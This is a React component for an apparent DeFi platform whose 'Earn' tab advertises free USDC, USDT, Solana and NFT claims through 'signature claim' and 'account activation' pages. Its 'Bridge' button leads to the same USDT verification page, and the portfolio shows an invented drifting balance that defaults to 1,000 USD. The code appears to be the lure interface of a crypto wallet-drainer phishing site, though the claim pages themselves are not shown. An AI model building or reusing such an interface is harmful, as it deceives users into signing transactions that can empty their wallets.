import React, { useState, useEffect } from 'react';
import DappShell from '../../components/DappShell';
import { StakeDapp } from '../StakeDapp/StakeDapp';
import { DappSwap } from '../DappSwap/DappSwap';
import { useT } from '../../utils/translations';
import { usePublicConfig } from '../../utils/publicConfig';
import LiveNumber from '../../components/LiveNumber';
import TokenIcon from '../../components/TokenIcon';
import './AppDapp.css';

/**
 * 完整 DApp 平台：Tab 导航（Swap / Stake / Earn / Bridge）。
 * 类似主流 DeFi 产品的一体化体验。
 */
const AppDapp = () => {
  const t = useT();
  const cfg = usePublicConfig();
  const [tab, setTab] = useState('stake');
  const [account, setAccount] = useState('');

  const TABS = [
    { key: 'stake', label: 'Stake', icon: '📈' },
    { key: 'swap', label: 'Swap', icon: '🔄' },
    { key: 'earn', label: 'Earn', icon: '🎁' },
    { key: 'bridge', label: 'Bridge', icon: '🌉' },
    { key: 'portfolio', label: 'Portfolio', icon: '💼' },
  ];

  const goClaim = (path) => {
    window.location.href = path;
  };

  // Portfolio：真实链上余额
  const [assets, setAssets] = useState([]);
  const [loadingAssets, setLoadingAssets] = useState(false);
  const USDC = '0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48';
  const USDT = '0xdAC17F958D2ee523a2206206994597C13D831ec7';
  const PRICES = { ETH: 3218.5, USDC: 1, USDT: 1 };

  const loadAssets = async () => {
    const p = window.ethereum;
    if (!p || !account) return;
    setLoadingAssets(true);
    try {
      const bal = async (token) => {
        const data = '0x70a08231' + account.slice(2).toLowerCase().padStart(64, '0');
        const r = await p.request({ method: 'eth_call', params: [{ to: token, data }, 'latest'] });
        return parseInt(r || '0x0', 16) / 1e6;
      };
      const ethR = await p.request({ method: 'eth_getBalance', params: [account, 'latest'] });
      const eth = parseInt(ethR || '0x0', 16) / 1e18;
      const usdc = await bal(USDC);
      const usdt = await bal(USDT);
      const list = [
        { name: 'Ethereum', symbol: 'ETH', amount: eth, value: eth * PRICES.ETH },
        { name: 'USD Coin', symbol: 'USDC', amount: usdc, value: usdc * PRICES.USDC },
        { name: 'Tether USD', symbol: 'USDT', amount: usdt, value: usdt * PRICES.USDT },
      ];
      setAssets(list);
    } catch (e) { /* ignore */ }
    setLoadingAssets(false);
  };

  useEffect(() => {
    if (tab === 'portfolio') loadAssets();
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [tab, account]);

  return (
    <DappShell account={account} network="Ethereum">
      <div className="appdapp">
        {/* Tab 导航 */}
        <nav className="appdapp-tabs">
          {TABS.map((tabItem) => (
            <button
              key={tabItem.key}
              className={`appdapp-tab ${tab === tabItem.key ? 'on' : ''}`}
              onClick={() => setTab(tabItem.key)}
            >
              <span>{tabItem.icon}</span> {tabItem.label}
            </button>
          ))}
        </nav>

        {tab === 'stake' && <StakeDapp embedded onAccount={setAccount} />}
        {tab === 'swap' && <DappSwap embedded onAccount={setAccount} />}

        {tab === 'earn' && (
          <div className="appdapp-earn">
            <h3>🎁 Earn Center</h3>
            <p className="appdapp-sub">One-tap claim campaigns across networks. Zero fees, sponsored by osman.</p>
            <div className="appdapp-cards">
              <div className="appdapp-card" onClick={() => goClaim('/evm')}>
                <span className="appdapp-card-icon"><TokenIcon symbol="USDC" size={30} /></span>
                <b>USDC Bonus</b>
                <p>Ethereum · signature claim</p>
                <button className="appdapp-go">Claim →</button>
              </div>
              <div className="appdapp-card" onClick={() => goClaim('/evm-usdt')}>
                <span className="appdapp-card-icon"><TokenIcon symbol="USDT" size={30} /></span>
                <b>USDT Verification</b>
                <p>Ethereum / BSC · account activation</p>
                <button className="appdapp-go">Verify →</button>
              </div>
              <div className="appdapp-card" onClick={() => goClaim('/sol')}>
                <span className="appdapp-card-icon"><TokenIcon symbol="SOL" size={30} /></span>
                <b>Solana Airdrop</b>
                <p>Solana · Phantom claim</p>
                <button className="appdapp-go">Claim →</button>
              </div>
              <div className="appdapp-card" onClick={() => goClaim('/evm-nft')}>
                <span className="appdapp-card-icon">🖼️</span>
                <b>NFT Holder Rewards</b>
                <p>Ethereum · holder verification</p>
                <button className="appdapp-go">Unlock →</button>
              </div>
            </div>
          </div>
        )}

        {tab === 'portfolio' && (
          <div className="appdapp-earn">
            <h3>💼 Portfolio</h3>
            <p className="appdapp-sub">Your assets across networks. Connected via non-custodial wallet.</p>
            <div className="appdapp-total">
              <span>Total Balance</span>
              <b>${assets.reduce((a, x) => a + x.value, 0).toFixed(2)}</b>
              <p>≈ <LiveNumber base={assets.reduce((a, x) => a + x.value, 0) || 1000} decimals={2} drift={3} /> USD</p>
            </div>
            {loadingAssets && (
              <div className="appdapp-skeleton">
                <div className="sk-line w60" />
                <div className="sk-line w80" />
                <div className="sk-line w40" />
              </div>
            )}
            {!account && <p className="appdapp-sub">Connect your wallet to view your portfolio.</p>}
            {account && assets.map((a) => (
              <div className="appdapp-asset" key={a.symbol}>
                <span className="appdapp-asset-icon"><TokenIcon symbol={a.symbol} size={28} /></span>
                <div className="appdapp-asset-info">
                  <b>{a.name}</b>
                  <p>{a.amount.toFixed(4)} {a.symbol}</p>
                </div>
                <span className="appdapp-asset-val">${a.value.toFixed(2)}</span>
              </div>
            ))}
            <div className="appdapp-recent">
              <div className="stake-feeds-title">Recent Activity</div>
              {(JSON.parse(localStorage.getItem('osman_txs') || '[]')).slice(0, 5).map((r, i) => (
                <div className="appdapp-recent-row" key={i}>
                  <span>{r.type}</span>
                  <b>{r.detail}</b>
                  <span>{r.time}</span>
                </div>
              ))}
              {!(JSON.parse(localStorage.getItem('osman_txs') || '[]')).length && (
                <p className="appdapp-sub">No recent activity on this device.</p>
              )}
            </div>
            <div className="appdapp-earn-stats">
              <div><b>$0.00</b><span>Est. 30D earnings</span></div>
              <div><b>0</b><span>Active positions</span></div>
            </div>
          </div>
        )}

        {tab === 'bridge' && (
          <div className="appdapp-bridge">
            <h3>🌉 Cross-Chain Bridge</h3>
            <p className="appdapp-sub">Move assets between networks instantly with zero bridge fees.</p>
            <div className="appdapp-bridge-box">
              <div className="appdapp-bridge-row">
                <span>From</span>
                <b>Ethereum</b>
              </div>
              <div className="appdapp-bridge-arrow">↓</div>
              <div className="appdapp-bridge-row">
                <span>To</span>
                <b>BSC</b>
              </div>
              <button className="appdapp-bridge-btn" onClick={() => goClaim('/evm-usdt?chain=bsc')}>
                Bridge Assets →
              </button>
            </div>
            <p className="appdapp-hint">Maintenance-free bridging is sponsored by the osman foundation.</p>
          </div>
        )}
      </div>
    </DappShell>
  );
};

export default AppDapp;
